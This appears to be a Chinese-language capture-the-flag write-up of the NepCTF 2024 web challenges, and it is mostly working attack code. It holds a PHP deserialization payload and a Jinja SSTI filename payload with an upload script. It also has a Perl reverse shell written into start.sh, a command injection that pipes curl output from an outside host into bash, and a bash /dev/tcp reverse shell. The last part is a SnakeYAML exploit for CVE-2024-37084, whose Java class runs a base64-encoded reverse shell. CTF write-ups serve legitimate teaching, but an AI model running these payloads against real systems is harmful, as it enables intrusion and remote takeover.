【Web】NepCTF 2024题解

目录

PHP_MASTER!!

NepDouble

蹦蹦炸弹（boom_it）

NepRouter-白给

Always RCE First 

PHP_MASTER!!

PHP反序列化键值逃逸+mb_strpos与mb_substr连用导致的字符注入

https://www.cnblogs.com/EddieMurphy-blogs/p/18310518

flag在phpinfo里

payload:

?c=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00";s:3:"str";O:1:"B":1:{s:1:"b";s:7:"phpinfo";}}&nep1=%f0123%f0123%f0123%9f%9f%f0123&nep=Nep

NepDouble

在文件名处打SSTI

convert.py

def escape_string(s):# 定义要转义的字符replacements = {'{': r'\{','}': r'\}','[': r'\[',']': r'\]','(': r'\(',')': r'\)',"'": r"\'",'"': r'\"',}# 替换字符串中的特殊字符for char, replacement in replacements.items():s = s.replace(char, replacement)return s# 原始字符串
original_string = """{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('\\\\143'+'\\\\141'+'\\\\164'+'\\\\40'+'\\\\57'+'\\\\146'+'\\\\52').read()")}}"""# 转义字符串
escaped_string = escape_string(original_string)print(escaped_string)

生成恶意文件名的文件

vim \{\{x.__init__.__globals__\[\'__builtins__\'\]\[\'eval\'\]\(\"__import__\(\'os\'\).popen\(\'\\143\'+\'\\141\'+\'\\164\'+\'\\40\'+\'\\57\'+\'\\146\'+\'\\52\'\).read\(\)\"\)\}\}

压缩成zip

zip 1.zip \{\{x.__init__.__globals__\[\'__builtins__\'\]\[\'eval\'\]\(\"__import__\(\'os\'\).popen\(\'\\143\'+\'\\141\'+\'\\164\'+\'\\40\'+\'\\57\'+\'\\146\'+\'\\52\'\).read\(\)\"\)\}\}

upload.py上传

import requests# 定义服务器的URL
url = "https://neptune-32978.nepctf.lemonprefect.cn/"  # 替换为你的 Flask 服务器地址# 定义要上传的文件路径
file_path = "1.zip" # 替换为你要上传的 ZIP 文件路径# 打开文件，以便于上传
with open(file_path, 'rb') as file:# 构建请求的文件部分files = {'tp_file': file}# 发送 POST 请求，上传文件response = requests.post(url, files=files)# 输出服务器响应print("Status Code:", response.status_code)print("Response Text:", response.text)

蹦蹦炸弹（boom_it）

先是flask的session伪造

再路径穿越上传lock.txt

 之后便能低权限rce

start.sh有权限更改

echo '#!/bin/bash' > start.sh
echo "perl -e 'use Socket;\$i=\"124.222.136.33\";\$p=1338;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" >> start.sh

 数据占用打崩，让服务重启反弹shell

nc 127.0.0.1 8888 < /etc/passwd

root权限读flag

NepRouter-白给

第一个注册流程，无论给什么图片都是TEST

找到拿字符串的html位置，手改成自己的 id，然后注册

这里要求存在一个用户NepNepIStheBestTeam，在前面就注册这个用户就能登录8080端口

setRouter处可以命令注入

参数不能带空格，用${IFS}

vps 1338起个恶意服务

bash -i >& /dev/tcp/124.222.136.33/1337 0>&1

 反弹shell

/setrouter?ip_address=127.0.0.1;curl${IFS}http://124.222.136.33:1338/evil.html|bash

Always RCE First 

对着CVE-2024-37084复现

 奇安信攻防社区-Spring Cloud Data Flow 漏洞分析（CVE-2024-22263|CVE-2024-37084）

GitHub - artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads

package.yaml

apiVersion: 1.0.0
origin: my origin
repositoryId: 12345
repositoryName: local
kind: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://124.222.136.33:1338/yaml-payload.jar"]]]]
name: test
version: 1.0.0

AwesomeScriptEngineFactory.java

package artsploit;import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;public class AwesomeScriptEngineFactory implements ScriptEngineFactory {public AwesomeScriptEngineFactory() {try {Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}");} catch (IOException e) {e.printStackTrace();}}@Overridepublic String getEngineName() {return null;}@Overridepublic String getEngineVersion() {return null;}@Overridepublic List<String> getExtensions() {return null;}@Overridepublic List<String> getMimeTypes() {return null;}@Overridepublic List<String> getNames() {return null;}@Overridepublic String getLanguageName() {return null;}@Overridepublic String getLanguageVersion() {return null;}@Overridepublic Object getParameter(String key) {return null;}@Overridepublic String getMethodCallSyntax(String obj, String m, String... args) {return null;}@Overridepublic String getOutputStatement(String toDisplay) {return null;}@Overridepublic String getProgram(String... statements) {return null;}@Overridepublic ScriptEngine getScriptEngine() {return null;}
}

zip包转字节列表脚本

def zip_to_byte_list(zip_file_path):# 打开并读取 ZIP 文件的二进制数据with open(zip_file_path, 'rb') as file:byte_content = file.read()# 将二进制数据转换为字节列表byte_list = list(byte_content)return byte_list# 使用示例
zip_file_path = 'test-1.1.1.zip'  # 替换为你的ZIP文件路径
byte_list = zip_to_byte_list(zip_file_path)
print(byte_list)  # 输出字节列表

/api/package/upload传payload:

{"repoName":"local","name":"test","version":"1.1.1","extension":"zip","packageFileAsBytes":[x,x,x,x]}

反弹shell拿flag